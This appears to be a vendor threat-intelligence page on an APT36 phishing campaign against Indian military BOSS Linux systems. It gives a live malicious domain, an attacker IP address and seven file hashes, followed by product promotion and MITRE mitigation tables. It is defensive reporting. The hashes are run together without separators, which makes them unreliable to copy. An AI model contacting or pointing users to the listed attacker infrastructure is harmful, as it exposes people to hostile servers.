
Cyber Campaign Exploits BOSS Linux in Indian Military Systems
This cyber campaign targets Indian military systems running BOSS Linux through a sophisticated phishing-based malware attack. The attackers aim to infiltrate critical infrastructure by exploiting vulnerabilities in the open-source OS. Once inside, the malware enables unauthorized access, potential data exfiltration, and disruption of military operations. The campaign highlights growing threats to national defense networks and the need for stronger cybersecurity measures in Linux-based government systems.
Indicators of Compromise
Domains (2)
modgovindia.spacesecurestore.cvHashes (7)
bcef7d3ca12afa877467efc078d9c80c0ea5d24210b7139952e3daae8f9d7ee407696ccf1d1dc12334b79656c0154dab8e8afdbff14f131d508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b15bfeeae3cc9386513dc7c301c61e67a7e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1IPv4 (1)
45.141.58.199Notes
<div class="content-body"> <span class="content-title">CONLUSION</span> <p class="content-description">The phishing campaign targeting Indian military systems using BOSS Linux demonstrates a high-severity, espionage-driven threat orchestrated by the APT36 group. This operation showcases a combination of social engineering, Linux-specific malware, and stealthy command-and-control techniques designed to infiltrate and maintain access to highly sensitive infrastructure.</p> <p class="content-description">Given the sophistication of the malware, its ability to bypass detection, and its targeting of national defense systems, this campaign highlights the urgent need for governments and critical sectors to adopt specialized cybersecurity frameworks tailored to Linux environments.</p> <p class="content-description">🛡️ How SOCRadar Helps</p> <p class="content-description">Organizations can proactively detect, monitor, and mitigate such threats using SOCRadar’s integrated modules:</p> <p class="content-description">🔍 1. Threat Intelligence Module</p> <p class="content-description">• Tracks APT36 activities and related IoCs in real time.</p> <p class="content-description">• Detects phishing infrastructure (like sorlastore[.]com) before it reaches users.</p> <p class="content-description">• Provides contextual intelligence on ELF malware, Linux exploits, and attacker infrastructure.</p> <p class="content-description">📩 2. Digital Risk Protection (DRP)</p> <p class="content-description">• Monitors for phishing domains, spoofed emails, and fake government content targeting BOSS Linux users.</p> <p class="content-description">• Identifies ZIP or .desktop files used in active phishing lures.</p> <p class="content-description">• Alerts if your brand, organization, or email domains are being mimicked.</p> <p class="content-description">🧠 3. Attack Surface Management (ASM)</p> <p class="content-description">• Detects exposed BOSS Linux systems or misconfigured services within your infrastructure.</p> <p class="content-description">• Helps prioritize patching of systems vulnerable to Linux-targeted malware.</p> <p class="content-description">🛡️ 4. Threat Fusion & Correlation</p> <p class="content-description">• Correlates indicators like malicious hashes, IPs, and domains with ongoing attack campaigns.</p> <p class="content-description">• Maps threats to MITRE ATT&CK to visualize attacker techniques (T1566, T1036, T1105, etc.)</p> <p class="content-description">By leveraging SOCRadar’s modules, organizations can enhance visibility across their Linux-based environments, receive early warning of phishing and APT campaigns, and significantly reduce their exposure to state-sponsored cyber threats like the one targeting BOSS Linux.</p> </div>
Mitigation
<div class="content-container"> <span class="content-title">T1036 - Masquerading</span> <div align="left"> <table> <colgroup> <col> <col> <col> </colgroup> <tbody> <tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1049">M1049</a></td> <td><a href="https://attack.mitre.org/mitigations/M1049">Antivirus/Antimalware</a></td> <td>Anti-virus can be used to automatically quarantine suspicious files.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1047">M1047</a></td> <td><a href="https://attack.mitre.org/mitigations/M1047">Audit</a></td> <td>Audit user accounts to ensure that each one has a defined purpose.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1040">M1040</a></td> <td><a href="https://attack.mitre.org/mitigations/M1040">Behavior Prevention on Endpoint</a></td> <td>Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of potentially malicious files (such as those with mismatching file signatures).</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1045">M1045</a></td> <td><a href="https://attack.mitre.org/mitigations/M1045">Code Signing</a></td> <td>Require signed binaries.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1038">M1038</a></td> <td><a href="https://attack.mitre.org/mitigations/M1038">Execution Prevention</a></td> <td>Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1022">M1022</a></td> <td><a href="https://attack.mitre.org/mitigations/M1022">Restrict File and Directory Permissions</a></td> <td>Use file system access controls to protect folders such as C:\Windows\System32.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1018">M1018</a></td> <td><a href="https://attack.mitre.org/mitigations/M1018">User Account Management</a></td> <td>Consider defining and enforcing a naming convention for user accounts to more easily spot generic account names that do not fit the typical schema.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1017">M1017</a></td> <td><a href="https://attack.mitre.org/mitigations/M1017">User Training</a></td> <td>Train users not to open email attachments or click unknown links (URLs). Such training fosters more secure habits within your organization and will limit many of the risks.</td> </tr> </tbody> </table> </div> <span class="content-title">T0853 - Scripting</span> <div align="left"> <table> <colgroup> <col> <col> <col> </colgroup> <tbody> <tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M0948">M0948</a></td> <td><a href="https://attack.mitre.org/mitigations/M0948">Application Isolation and Sandboxing</a></td> <td>Consider the use of application isolation and sandboxing to restrict specific operating system interactions such as access through user accounts, services, system calls, registry, and network access. This may be even more useful in cases where the source of the executed script is unknown.</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M0942">M0942</a></td> <td><a href="https://attack.mitre.org/mitigations/M0942">Disable or Remove Feature or Program</a></td> <td>Consider removal or disabling of programs and features which may be used to run malicious scripts (e.g., scripting language IDEs, PowerShell, visual studio).</td> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M0938">M0938</a></td> <td><a href="https://attack.mitre.org/mitigations/M0938">Execution Prevention</a></td> <td>Execution prevention may prevent malicious scripts from accessing protected resources.</td> </tr> </tbody> </table> </div> <span class="content-title">T1071 - Application Layer Protocol</span> <div align="left"> <table> <colgroup> <col> <col> <col> </colgroup> <tbody> <tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1037">M1037</a></td> <td><a href="https://attack.mitre.org/mitigations/M1037">Filter Network Traffic</a></td> <td>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.</td> </tr> </tbody> </table> </div> <span class="content-title">T1095 - Non-Application Layer Protocol</span> <div align="left"> <table> <colgroup> <col> <col> <col> </colgroup> <tbody> <tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr> <tr> <td><a href="https://attack.mitre.org/mitigations/M1047">M1047</a></td> <td><a href="https://attack.mitre.org/mitigations/M1047">Audit</a></td> <td>Periodically investigate ESXi hosts for open VMCI ports. Running the <span style="font-size: 8.5pt; font-family: Arial, sans-serif; color: rgb(29, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">lsof -A</span> command and inspecting results with a type of <span style="font-size: 8.5pt; font-family: Arial, sans-serif; color: rgb(29, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">SOCKET_VMCI</span> will reveal processes that have open VMCI ports.<a href="https://cloud.google.com/blog/topics/threat-intelligence/vmware-detection-containment-hardening"><span style="font-size: 7pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; vertical-align: baseline;">[102]</span></a></td> </tr> </tbody> </table> </div> </div>